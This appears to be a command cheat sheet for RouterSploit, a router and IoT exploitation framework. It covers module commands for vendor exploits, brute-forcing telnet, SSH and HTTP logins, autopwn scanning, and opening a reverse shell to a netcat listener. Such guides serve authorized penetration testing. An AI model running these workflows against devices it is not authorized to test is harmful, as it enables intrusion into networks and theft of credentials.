RouterSploit
Overview
Section intitulée « Overview »RouterSploit is an open-source exploitation framework designed for testing embedded devices, routers, and IoT equipment. It provides a modular approach to vulnerability assessment, credential testing, and exploitation of network devices similar to Metasploit but specialized for router and embedded device penetration testing.
Installation
Section intitulée « Installation »Ubuntu/Debian
Section intitulée « Ubuntu/Debian »git clone https://github.com/threat9/routersploit.git
cd routersploit
pip install -r requirements.txt
python3 rsf.pybrew install python3
git clone https://github.com/threat9/routersploit.git
cd routersploit
pip3 install -r requirements.txt
python3 rsf.pydocker run -it threat9/routersploitFrom Source
Section intitulée « From Source »git clone https://github.com/threat9/routersploit.git
cd routersploit
python3 setup.py install
python3 rsf.pyStarting the Interactive Console
Section intitulée « Starting the Interactive Console »python3 rsf.py
# RouterSploit> prompt appearsBasic Commands
Section intitulée « Basic Commands »| Command | Description |
|---|---|
help | Display all available commands |
show modules | List all available modules |
search [keyword] | Search modules by name or description |
use [module] | Load a specific module |
info | Display module information and options |
set [option] [value] | Configure module options |
back | Exit current module |
show options | Display current module options |
exploit or run | Execute the current module |
exit | Exit RouterSploit |
Module Types
Section intitulée « Module Types »Exploits
Section intitulée « Exploits »Modules that execute vulnerabilities to gain unauthorized access or control:
use exploits/d-link/dir_815_rce
use exploits/netgear/cmd_injection
use exploits/tp-link/authentication_bypass
use exploits/cisco/arbitrary_file_uploadCredential Testing
Section intitulée « Credential Testing »Modules for testing default credentials and brute-forcing:
use creds/telnet_bruteforce
use creds/ssh_bruteforce
use creds/http_bruteforce
use creds/default_credsScanners
Section intitulée « Scanners »Modules that scan for vulnerabilities without exploitation:
use scanners/autopwn
use scanners/port_scanner
use scanners/service_scanner
use scanners/vulnerability_scannerPayloads
Section intitulée « Payloads »Modules for generating and delivering payloads:
use payloads/reverse_shell
use payloads/bind_shellSearching and Listing Modules
Section intitulée « Searching and Listing Modules »Search by Keyword
Section intitulée « Search by Keyword »search d-link
search rce
search authentication
search remote_code_executionList All Modules
Section intitulée « List All Modules »show modules
show modules | grep exploit
show modules | grep creds
show modules | grep scannerGet Module Details
Section intitulée « Get Module Details »use exploits/netgear/cmd_injection
info
# Shows: description, options, required fields, vendor infoWorking with Exploits
Section intitulée « Working with Exploits »Basic Exploit Workflow
Section intitulée « Basic Exploit Workflow »# 1. Search for relevant exploit
search netgear
# 2. Load the module
use exploits/netgear/cmd_injection
# 3. View options
show options
# LHOST (attacker IP), LPORT (listener port), TARGET (target IP)
# 4. Set required options
set target 192.168.1.1
set lhost 192.168.1.100
set lport 4444
# 5. Execute exploit
exploit
# or
runSetting Target Information
Section intitulée « Setting Target Information »set target 192.168.1.1
set target http://192.168.1.1:8080
set rhost 192.168.1.1 # Remote hostSetting Payload Options
Section intitulée « Setting Payload Options »set lhost 192.168.1.100 # Listener/attacker host
set lport 4444 # Listener port
set lpass password123 # Listener password
set payload reverse_shellViewing Exploit Requirements
Section intitulée « Viewing Exploit Requirements »info
# Shows which options are required vs optional
show optionsCredential Testing
Section intitulée « Credential Testing »Default Credential Testing
Section intitulée « Default Credential Testing »use creds/default_creds
set target 192.168.1.1
set vendor netgear
exploitBrute-Force Attack
Section intitulée « Brute-Force Attack »use creds/telnet_bruteforce
set target 192.168.1.1
set username admin
set wordlist /path/to/passwords.txt
exploitHTTP Credential Brute-Force
Section intitulée « HTTP Credential Brute-Force »use creds/http_bruteforce
set target 192.168.1.1
set username admin
set wordlist /path/to/wordlist.txt
set threads 4
exploitSSH Brute-Force
Section intitulée « SSH Brute-Force »use creds/ssh_bruteforce
set target 192.168.1.1
set port 22
set username root
set wordlist /path/to/passwords.txt
exploitScanner Modules
Section intitulée « Scanner Modules »AutoPwn Scanner
Section intitulée « AutoPwn Scanner »Automatically scans for vulnerabilities and attempts exploitation:
use scanners/autopwn
set target 192.168.1.1
exploit
# Scans for known vulnerabilities and exploitation pathsPort Scanner
Section intitulée « Port Scanner »Identifies open ports on target:
use scanners/port_scanner
set target 192.168.1.1
set ports 1-1000
exploitService Detection
Section intitulée « Service Detection »Identifies services and versions:
use scanners/service_scanner
set target 192.168.1.1
exploitVulnerability Scanner
Section intitulée « Vulnerability Scanner »Scans for known vulnerabilities:
use scanners/vulnerability_scanner
set target 192.168.1.1
set vendor netgear
exploitSupported Vendors
Section intitulée « Supported Vendors »RouterSploit includes modules for major router and embedded device manufacturers:
| Vendor | Common Vulnerabilities |
|---|---|
| D-Link | Directory traversal, RCE, auth bypass |
| Netgear | Command injection, authenticated RCE |
| TP-Link | Authentication bypass, RCE |
| Cisco | File upload, auth bypass, buffer overflow |
| Huawei | Authentication bypass, RCE |
| Ubiquiti | Authentication bypass, RCE |
| Linksys | Command injection, firmware upload |
| Belkin | Default credentials, auth bypass |
| ASUS | Arbitrary file upload, RCE |
| Mikrotik | Authentication bypass, RCE |
Common Workflows
Section intitulée « Common Workflows »Reconnaissance and Exploitation
Section intitulée « Reconnaissance and Exploitation »# Step 1: Scan target network
use scanners/port_scanner
set target 192.168.1.1
exploit
# Step 2: Identify device and run AutoPwn
use scanners/autopwn
set target 192.168.1.1
exploit
# Step 3: Attempt default credentials
use creds/default_creds
set target 192.168.1.1
exploitTargeted Exploitation
Section intitulée « Targeted Exploitation »# Know target device? Search directly
search "TP-Link WR841N"
# Load specific exploit
use exploits/tp-link/wr841n_rce
# Set options
set target 192.168.1.1
set lhost 192.168.1.100
# Execute
exploitCredential Harvesting
Section intitulée « Credential Harvesting »# Multiple credential testing approaches
use creds/default_creds
set target 192.168.1.1
exploit
# Then brute-force remaining services
use creds/telnet_bruteforce
set target 192.168.1.1
exploitPost-Exploitation Shell Access
Section intitulée « Post-Exploitation Shell Access »# After successful exploit, obtain shell
# Set up listener (in separate terminal)
nc -lvnp 4444
# In RouterSploit, execute reverse shell payload
set payload reverse_shell
set lhost 192.168.1.100
set lport 4444
exploit
# Shell connects to listenerCustom Module Creation
Section intitulée « Custom Module Creation »Module Structure
Section intitulée « Module Structure »Create custom exploit at routersploit/modules/exploits/custom/:
from routersploit.modules import *
class Exploit(BaseExploit):
"""Custom Router Exploitation Module"""
info = {
'name': 'Custom Router RCE',
'description': 'Custom exploitation module description',
'vendor': 'Custom Vendor',
'model': 'Custom Model',
'version': '1.0',
}
target = Param.ip_addr('Target IP')
port = Param.port(80, 'Target port')
def check(self):
"""Check if target is vulnerable"""
# Vulnerability check logic
pass
def exploit(self):
"""Execute exploit"""
# Exploitation logic
passRouterSploit vs Metasploit
Section intitulée « RouterSploit vs Metasploit »| Feature | RouterSploit | Metasploit |
|---|---|---|
| Focus | Routers/IoT | General penetration testing |
| Learning Curve | Lower | Higher |
| Module Availability | Router-specific | Extensive (all targets) |
| Ease of Use | Simpler | More complex |
| Customization | Good | Excellent |
| Community | Smaller | Large |
| Target Scope | Embedded/Router | Broad |
| Price | Free | Free community version |
Advanced Options
Section intitulée « Advanced Options »Setting Threads for Brute-Force
Section intitulée « Setting Threads for Brute-Force »use creds/http_bruteforce
set threads 10
# Increases concurrent attemptsCustom Wordlists
Section intitulée « Custom Wordlists »set wordlist /path/to/custom/passwords.txt
set username_wordlist /path/to/usernames.txtTimeout Configuration
Section intitulée « Timeout Configuration »set timeout 10
# Increases response wait time for slow networksLogging Output
Section intitulée « Logging Output »exploit > output.log
# Capture results to fileTroubleshooting
Section intitulée « Troubleshooting »| Issue | Solution |
|---|---|
| Module not found | Use search to find correct module name |
| Connection refused | Verify target IP and port accessibility |
| Exploit fails silently | Run info to verify all required options set |
| Slow brute-force | Increase threads parameter |
| Python import errors | Reinstall dependencies: pip install -r requirements.txt |
Security Considerations
Section intitulée « Security Considerations »- Always obtain written permission before testing
- Use on devices you own or have explicit authorization to test
- RouterSploit should only be used for authorized security assessments
- Document all findings and exploitation attempts
- Disable unnecessary services on production routers
- Regularly update firmware on network devices
- Change default credentials immediately after device setup
Resources
Section intitulée « Resources »- Official GitHub: https://github.com/threat9/routersploit
- Module documentation in repository
- Vulnerability research databases (CVE, NVD)
- Vendor security advisories
- IoT security blogs and research papers